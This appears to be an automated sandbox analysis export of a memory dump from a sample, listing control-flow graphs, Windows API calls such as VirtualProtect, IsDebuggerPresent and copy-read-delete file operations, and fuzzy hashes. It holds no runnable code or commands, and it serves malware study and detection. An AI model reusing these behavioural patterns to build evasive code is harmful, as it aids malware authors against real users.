                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                                                                    • Opcode ID: 3e908f2ecaa81469cdc02b0ad555967abb4b048711ac79a921ad9b24b7d5fded
                                                                                                                                                                                                                                    • Instruction ID: 7fa3a2ec6b819fa96bfbc2916748e556e77d8094a5be124e8c590a407d6d2147
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e908f2ecaa81469cdc02b0ad555967abb4b048711ac79a921ad9b24b7d5fded
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0311295570B3816EF7214A740C40AB66FD9CB673B4F1C068FDD80CB683D5A48616C3B6

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 105 33a3c803-33a3c80b GetProcAddress 106 33a3c82d 105->106 107 33a3c80d-33a3c81a VirtualProtect 105->107 110 33a3c82f-33a3c833 106->110 108 33a3c82c 107->108 109 33a3c81c-33a3c82a VirtualProtect 107->109 108->106 109->108 111 33a3c872 LdrInitializeThunk 110->111 112 33a3c835-33a3c83d GetModuleHandleA 110->112 113 33a3c83f-33a3c847 112->113 113->113 114 33a3c849-33a3c84c 113->114 114->110 115 33a3c84e-33a3c850 114->115 116 33a3c852-33a3c854 115->116 117 33a3c856-33a3c85e 115->117 118 33a3c85f-33a3c865 GetProcAddress 116->118 117->118 121 33a3c866-33a3c86e 118->121 124 33a3c870 121->124 124->114
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,33A3C7F4), ref: 33A3C804
                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,00000000,00000000,33A3C7F4,33A3C7DD), ref: 33A3C816
                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,?,00000000,00000000,33A3C7F4,33A3C7DD), ref: 33A3C82A
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,33A3C7DD), ref: 33A3C838
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 33A3C860
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2152742572-0
                                                                                                                                                                                                                                    • Opcode ID: 9140eaa08c5d122f984b313d2600f35573c21d4dae5556e03d594b9c17f04e83
                                                                                                                                                                                                                                    • Instruction ID: 629c57538ccccc3bf682aa3f84585dda3d5db2873fef268c26a44bda5dba613f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9140eaa08c5d122f984b313d2600f35573c21d4dae5556e03d594b9c17f04e83
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0F0CD95B8B3403CFA1149B41C41ABA5FCCCA277B0B181A5BED40C7282E8A9870683F6

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 125 33a3571e-33a35727 126 33a35756-33a35757 125->126 127 33a35729-33a3573c RtlFreeHeap 125->127 127->126 128 33a3573e-33a35755 call 33a36368 GetLastError call 33a362ef 127->128 128->126
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,33A3924F,?,00000000,?,00000000,?,33A39276,?,00000007,?,?,33A37E5A,?), ref: 33A35734
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,33A3924F,?,00000000,?,00000000,?,33A39276,?,00000007,?,?,33A37E5A,?,?), ref: 33A35746
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                                    • Opcode ID: 3e3ec307314c87e988851aa10b16abf094ff1b3a571fd05ccf5ed5f8475178ef
                                                                                                                                                                                                                                    • Instruction ID: 75ed31c78ac2c44447a426ce9bdf89946171cc8c5d7b501d3e587a00d8f546d3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e3ec307314c87e988851aa10b16abf094ff1b3a571fd05ccf5ed5f8475178ef
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70E08631901304EBD7212FB8DC487893BDCEB027B1F500425FA0DAA550D6358452C784
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 33A32645
                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 33A32710
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 33A32730
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 33A3273A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                                    • Opcode ID: 0ad4101cfba22c2c1a7da33539fa3f10343bf422765f9a0c040108235376e7bc
                                                                                                                                                                                                                                    • Instruction ID: b2538ba24b6fdeb3eab614aebcf5e63311c3c9141f31c4e8a6026593d869fd19
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ad4101cfba22c2c1a7da33539fa3f10343bf422765f9a0c040108235376e7bc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6312975D46318DBDB11DFA4C9897CDBBF8BF09310F1040AAE80DAB250EB759A868F45
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 33A32276
                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 33A32285
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 33A3228E
                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 33A3229B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                    • Opcode ID: 13675faff04754ee715c9782ba5b25eecca2f9fc5fa31079d813aa6ed4fe1d79
                                                                                                                                                                                                                                    • Instruction ID: 4e4e9f087aa34f461eb0c7c5893c01315e7bfa5f2bd6ded5563abaed6b1cecd1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13675faff04754ee715c9782ba5b25eecca2f9fc5fa31079d813aa6ed4fe1d79
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CF05F71D10209EBCB00EBB4CA89ADEBBF8FF18715F514495A412F7140E774AB069F51
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,33A32C3B,33A3D1DC,00000017), ref: 33A32B21
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(33A3D1DC,?,33A32C3B,33A3D1DC,00000017), ref: 33A32B2A
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,33A32C3B,33A3D1DC,00000017), ref: 33A32B35
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,33A32C3B,33A3D1DC,00000017), ref: 33A32B3C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                                                    • Opcode ID: cbe4997b788e6c1190c6a7fc05bc68014d296fcde2ddd8a147e94424e6fa0571
                                                                                                                                                                                                                                    • Instruction ID: 175ed93c5691d69917491237ead92e7cbd6e0fda6309e03461e8a251d9f3e1ed
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbe4997b788e6c1190c6a7fc05bc68014d296fcde2ddd8a147e94424e6fa0571
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5D0E971048304EBD6403BE9DD0DAD93BA9EB06B66F044410F70BA6451DA759457CB55
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 33A361DA
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 33A361E4
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 33A361F1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                                    • Opcode ID: 7b763a01885782a8d49816f272a8973e1718ae5e39cbd0ff178ea341d8d85fde
                                                                                                                                                                                                                                    • Instruction ID: f1fc86792c4e7957b5d5fa00097964fbf691a0100705f7ba7e44415c0494c3a0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b763a01885782a8d49816f272a8973e1718ae5e39cbd0ff178ea341d8d85fde
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D531B275D023189BCB61DF68D98878DBBB8FF09720F5041DAE81CA7260E7349B868F45
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,33A34A8A,?,33A42238,?,33A34BBD,00000000,00000000,?,33A32082,33A42108,?,33A31F3A,?), ref: 33A34AD5
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,33A34A8A,?,33A42238,?,33A34BBD,00000000,00000000,?,33A32082,33A42108,?,33A31F3A,?), ref: 33A34ADC
                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 33A34AEE
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                    • Opcode ID: 550265b4f860b6c7a9c12f3acc1fcc33e1206924158f1654c3e1871e4cfd7c75
                                                                                                                                                                                                                                    • Instruction ID: fdb8d360eeaa8b369bf55734744edade5f98b96dddc21bca810ca30ff29afc75
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 550265b4f860b6c7a9c12f3acc1fcc33e1206924158f1654c3e1871e4cfd7c75
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDE0B636401308EFCF417F68CE49A893BA9EF427A1B508025FD069B521DB35D983CB54
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 33A3294C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                                                                                    • Opcode ID: bf73376533269f0ecf8e7ffb298525293c67a32c48eb495cd1f88c64d444a735
                                                                                                                                                                                                                                    • Instruction ID: ff9c2916ca4c308819ef10620382bd55bb5c4fc3822ec8cec108f7d45a9207b6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf73376533269f0ecf8e7ffb298525293c67a32c48eb495cd1f88c64d444a735
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24417DB1D023049FEB20DF58C58169ABBF4FB49320F64856BD845FB394D3769A52CBA0
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                                                    • Opcode ID: 1021c328a38e0dc38e9f3b3a414406f1d3d047e427539794d262d249af513a9d
                                                                                                                                                                                                                                    • Instruction ID: 228f56b590c2a425b997e8ebb74318fb2cc2c2410f519c51b71d24d7e8eaf551
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1021c328a38e0dc38e9f3b3a414406f1d3d047e427539794d262d249af513a9d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DA01130200302CF8300AE38CA0A20C3AECEA02AA0300002AA80BE8280EB2080238B00

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 220 33a3aa53-33a3aa6e 221 33a3aa80 220->221 222 33a3aa70-33a3aa7e RtlDecodePointer 220->222 223 33a3aa85-33a3aa8b 221->223 222->223 224 33a3abb2-33a3abb5 223->224 225 33a3aa91 223->225 228 33a3ac12 224->228 229 33a3abb7-33a3abba 224->229 226 33a3aa97-33a3aa9a 225->226 227 33a3aba6 225->227 231 33a3aaa0 226->231 232 33a3ab47-33a3ab4a 226->232 230 33a3aba8-33a3abad 227->230 233 33a3ac19 228->233 234 33a3ac06 229->234 235 33a3abbc-33a3abbf 229->235 240 33a3ac5b-33a3ac6a call 33a32ada 230->240 241 33a3aaa6-33a3aaab 231->241 242 33a3ab34-33a3ab42 231->242 238 33a3ab9d-33a3aba4 232->238 239 33a3ab4c-33a3ab4f 232->239 243 33a3ac20-33a3ac49 233->243 234->228 236 33a3abc1-33a3abc4 235->236 237 33a3abfa 235->237 246 33a3abc6-33a3abc9 236->246 247 33a3abee 236->247 237->234 251 33a3ab61-33a3ab8f 238->251 248 33a3ab51-33a3ab54 239->248 249 33a3ab94-33a3ab9b 239->249 244 33a3ab25-33a3ab2f 241->244 245 33a3aaad-33a3aab0 241->245 242->243 267 33a3ac56-33a3ac59 243->267 268 33a3ac4b-33a3ac50 call 33a36368 243->268 244->243 252 33a3aab2-33a3aab5 245->252 253 33a3ab1c-33a3ab23 245->253 255 33a3abe2 246->255 256 33a3abcb-33a3abd0 246->256 247->237 248->240 257 33a3ab5a 248->257 249->233 251->267 259 33a3aab7-33a3aaba 252->259 260 33a3ab0d-33a3ab17 252->260 264 33a3aac7-33a3aaf7 253->264 255->247 261 33a3abd2-33a3abd5 256->261 262 33a3abdb-33a3abe0 256->262 257->251 259->240 265 33a3aac0 259->265 260->243 261->240 261->262 262->230 264->267 274 33a3aafd-33a3ab08 call 33a36368 264->274 265->264 267->240 268->267 274->267
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DecodePointer
                                                                                                                                                                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                    • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                    • Opcode ID: 244683bc0a6bae40c540cba5f77398ce626bcae1fb102912545166275d5c20f3
                                                                                                                                                                                                                                    • Instruction ID: 170aaa21fe67adc5e8a40f0106cf168fef35cbc85f287593661d640f83dc3e67
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 244683bc0a6bae40c540cba5f77398ce626bcae1fb102912545166275d5c20f3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02515FB590172ACBDF009FA9E94859CBBB5FB0B321F54418BEC81A7354CB358E24C724

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A31D1B
                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,?,00000000,?,?,00000000), ref: 33A31D37
                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A31D4B
                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A31D58
                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A31D72
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A31D7D
                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A31D8A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1454806937-0
                                                                                                                                                                                                                                    • Opcode ID: 217d6bc9741a163fa5ec39bc4d0e55b29a596560bd9a2f0672759531fbc570b6
                                                                                                                                                                                                                                    • Instruction ID: 5670db06045f0ef79028351851f20200f419714d035a87ea0c5173035e9159da
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 217d6bc9741a163fa5ec39bc4d0e55b29a596560bd9a2f0672759531fbc570b6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D921217194231CAFE710ABA4DDCCEEA76ECEB0A7A4F040566F911E2140D7749E478B70

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 294 33a339be-33a339c8 295 33a33a6e-33a33a71 294->295 296 33a33a77 295->296 297 33a339cd-33a339dd 295->297 300 33a33a79-33a33a7d 296->300 298 33a339ea-33a33a03 LoadLibraryExW 297->298 299 33a339df-33a339e2 297->299 303 33a33a55-33a33a5e 298->303 304 33a33a05-33a33a0e GetLastError 298->304 301 33a33a6b 299->301 302 33a339e8 299->302 301->295 306 33a33a67-33a33a69 302->306 305 33a33a60-33a33a61 FreeLibrary 303->305 303->306 307 33a33a10-33a33a22 call 33a355f6 304->307 308 33a33a45 304->308 305->306 306->301 309 33a33a7e-33a33a80 306->309 307->308 314 33a33a24-33a33a36 call 33a355f6 307->314 311 33a33a47-33a33a49 308->311 309->300 311->303 313 33a33a4b-33a33a53 311->313 313->301 314->308 317 33a33a38-33a33a43 LoadLibraryExW 314->317 317->311
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                    • API String ID: 0-537541572
                                                                                                                                                                                                                                    • Opcode ID: 388bb08b6ad14a5bd94262c1d010dafeeea4848ce97a88d8513c2f09b503776a
                                                                                                                                                                                                                                    • Instruction ID: 87a6dfc65db5d8c5032fbfc5638c555eaac7270df76ac957e8c778ca174cca21
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 388bb08b6ad14a5bd94262c1d010dafeeea4848ce97a88d8513c2f09b503776a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96116676E0B711FBE711966D8C85A5A37989F03BB0F190116ED56AB2D0DA32D90286D0

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 33A31038
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 33A3104B
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 33A31061
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 33A31075
                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 33A31090
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 33A310B8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.30678203142.0000000033A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678167030.0000000033A30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.30678203142.0000000033A46000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_33a30000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3594823470-0
                                                                                                                                                                                                                                    • Opcode ID: bab88b307995c49841da5e3c25846dee572ad1a73e30ce0aa7fb87d2fcf0eb48
                                                                                                                                                                                                                                    • Instruction ID: c4bcb798a6601e5c0e7170e40946f7c3b28cfef59b2dac810a005113307bb2b0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bab88b307995c49841da5e3c25846dee572ad1a73e30ce0aa7fb87d2fcf0eb48
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E217F759013189BCF10AA65ED48EDB3768EF46334F10429AEC69A71A1DB319A86CB50

